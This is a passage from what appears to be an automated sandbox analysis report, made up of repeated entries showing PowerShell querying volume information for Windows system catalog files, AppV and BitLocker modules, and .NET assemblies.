Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
